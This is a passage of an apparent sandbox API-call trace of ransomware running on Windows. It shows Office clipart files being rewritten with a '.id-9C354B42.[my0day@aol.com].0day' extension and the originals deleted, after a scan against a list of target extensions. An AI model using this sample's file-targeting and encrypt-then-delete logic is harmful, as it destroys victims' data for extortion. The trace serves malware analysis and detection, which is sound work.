[0053.835] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.836] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.836] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.836] GetLastError () returned 0x0 [0053.836] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xd32, lpOverlapped=0x0) returned 1 [0054.072] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xd40, lpOverlapped=0x0) returned 1 [0054.100] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.100] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.100] SetEndOfFile (hFile=0x238) returned 1 [0054.100] CloseHandle (hObject=0x238) returned 1 [0054.100] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.100] SetEndOfFile (hFile=0x234) returned 1 [0054.101] CloseHandle (hObject=0x234) returned 1 [0054.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0054.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.101] lstrlenW (lpString=".doc") returned 4 [0054.101] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0054.101] lstrlenW (lpString=".docx") returned 5 [0054.102] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0054.102] lstrlenW (lpString=".pdf") returned 4 [0054.102] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0054.102] lstrlenW (lpString=".xls") returned 4 [0054.102] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0054.102] lstrlenW (lpString=".xlsx") returned 5 [0054.102] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0054.102] lstrlenW (lpString=".ppt") returned 4 [0054.102] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0054.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.102] lstrlenW (lpString=".zip") returned 4 [0054.102] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0054.102] lstrlenW (lpString=".rar") returned 4 [0054.102] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0054.102] lstrlenW (lpString=".bz2") returned 4 [0054.102] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0054.102] lstrlenW (lpString=".7z") returned 3 [0054.102] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0054.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.102] lstrlenW (lpString=".dbf") returned 4 [0054.102] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0054.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.102] lstrlenW (lpString=".1cd") returned 4 [0054.102] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0054.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0054.102] lstrlenW (lpString=".jpg") returned 4 [0054.102] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.419] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.425] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.014] GetLastError () returned 0x0 [0057.014] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x66dc, lpOverlapped=0x0) returned 1 [0057.041] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x66e0, lpOverlapped=0x0) returned 1 [0057.042] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.042] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.042] SetEndOfFile (hFile=0x208) returned 1 [0057.042] CloseHandle (hObject=0x208) returned 1 [0057.042] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.042] SetEndOfFile (hFile=0x170) returned 1 [0057.043] CloseHandle (hObject=0x170) returned 1 [0057.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.044] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0057.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.045] lstrlenW (lpString=".doc") returned 4 [0057.045] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.045] lstrlenW (lpString=".docx") returned 5 [0057.045] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.045] lstrlenW (lpString=".pdf") returned 4 [0057.045] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.045] lstrlenW (lpString=".xls") returned 4 [0057.045] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.045] lstrlenW (lpString=".xlsx") returned 5 [0057.045] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.045] lstrlenW (lpString=".ppt") returned 4 [0057.045] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.045] lstrlenW (lpString=".zip") returned 4 [0057.045] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.045] lstrlenW (lpString=".rar") returned 4 [0057.045] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.045] lstrlenW (lpString=".bz2") returned 4 [0057.045] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.045] lstrlenW (lpString=".7z") returned 3 [0057.045] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.045] lstrlenW (lpString=".dbf") returned 4 [0057.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.046] lstrlenW (lpString=".1cd") returned 4 [0057.046] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0057.046] lstrlenW (lpString=".jpg") returned 4 [0057.046] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.046] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.046] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.046] GetLastError () returned 0x0 [0057.046] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x3f34, lpOverlapped=0x0) returned 1 [0057.048] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3f40, lpOverlapped=0x0) returned 1 [0057.049] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.049] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.049] SetEndOfFile (hFile=0x208) returned 1 [0057.050] CloseHandle (hObject=0x208) returned 1 [0057.050] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.050] SetEndOfFile (hFile=0x170) returned 1 [0057.051] CloseHandle (hObject=0x170) returned 1 [0057.051] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.051] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0057.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.051] lstrlenW (lpString=".doc") returned 4 [0057.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.051] lstrlenW (lpString=".docx") returned 5 [0057.051] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.051] lstrlenW (lpString=".pdf") returned 4 [0057.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.051] lstrlenW (lpString=".xls") returned 4 [0057.051] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.051] lstrlenW (lpString=".xlsx") returned 5 [0057.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.052] lstrlenW (lpString=".ppt") returned 4 [0057.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.052] lstrlenW (lpString=".zip") returned 4 [0057.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.052] lstrlenW (lpString=".rar") returned 4 [0057.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.052] lstrlenW (lpString=".bz2") returned 4 [0057.052] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.052] lstrlenW (lpString=".7z") returned 3 [0057.052] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.052] lstrlenW (lpString=".dbf") returned 4 [0057.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.052] lstrlenW (lpString=".1cd") returned 4 [0057.052] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63 [0057.052] lstrlenW (lpString=".jpg") returned 4 [0057.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.052] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.052] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.053] GetLastError () returned 0x0 [0057.053] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x4354, lpOverlapped=0x0) returned 1 [0057.055] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4360, lpOverlapped=0x0) returned 1 [0057.056] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.056] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.056] SetEndOfFile (hFile=0x208) returned 1 [0057.056] CloseHandle (hObject=0x208) returned 1 [0057.056] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.056] SetEndOfFile (hFile=0x170) returned 1 [0057.057] CloseHandle (hObject=0x170) returned 1 [0057.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString=".doc") returned 4 [0057.058] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString=".docx") returned 5 [0057.058] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.058] lstrlenW (lpString=".pdf") returned 4 [0057.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString=".xls") returned 4 [0057.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.058] lstrlenW (lpString=".xlsx") returned 5 [0057.058] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.058] lstrlenW (lpString=".ppt") returned 4 [0057.058] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString=".zip") returned 4 [0057.058] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.058] lstrlenW (lpString=".rar") returned 4 [0057.058] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString=".bz2") returned 4 [0057.058] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString=".7z") returned 3 [0057.058] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString=".dbf") returned 4 [0057.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString=".1cd") returned 4 [0057.058] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0057.058] lstrlenW (lpString=".jpg") returned 4 [0057.058] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.059] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.059] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.059] GetLastError () returned 0x0 [0057.059] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x3ef0, lpOverlapped=0x0) returned 1 [0057.061] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3f00, lpOverlapped=0x0) returned 1 [0057.062] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.062] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.062] SetEndOfFile (hFile=0x208) returned 1 [0057.062] CloseHandle (hObject=0x208) returned 1 [0057.068] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.069] SetEndOfFile (hFile=0x170) returned 1 [0057.069] CloseHandle (hObject=0x170) returned 1 [0057.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.070] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.070] lstrlenW (lpString=".doc") returned 4 [0057.070] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.070] lstrlenW (lpString=".docx") returned 5 [0057.070] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.070] lstrlenW (lpString=".pdf") returned 4 [0057.070] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.070] lstrlenW (lpString=".xls") returned 4 [0057.070] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.070] lstrlenW (lpString=".xlsx") returned 5 [0057.070] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.070] lstrlenW (lpString=".ppt") returned 4 [0057.070] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.070] lstrlenW (lpString=".zip") returned 4 [0057.070] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.070] lstrlenW (lpString=".rar") returned 4 [0057.070] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.070] lstrlenW (lpString=".bz2") returned 4 [0057.070] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.070] lstrlenW (lpString=".7z") returned 3 [0057.070] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.070] lstrlenW (lpString=".dbf") returned 4 [0057.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.071] lstrlenW (lpString=".1cd") returned 4 [0057.071] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63 [0057.071] lstrlenW (lpString=".jpg") returned 4 [0057.071] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.071] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.072] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0057.072] GetLastError () returned 0x0 [0057.072] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x4124, lpOverlapped=0x0) returned 1 [0057.108] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0057.109] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.109] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.109] SetEndOfFile (hFile=0x208) returned 1 [0057.109] CloseHandle (hObject=0x208) returned 1 [0057.109] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.109] SetEndOfFile (hFile=0x170) returned 1 [0057.375] CloseHandle (hObject=0x170) returned 1 [0057.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 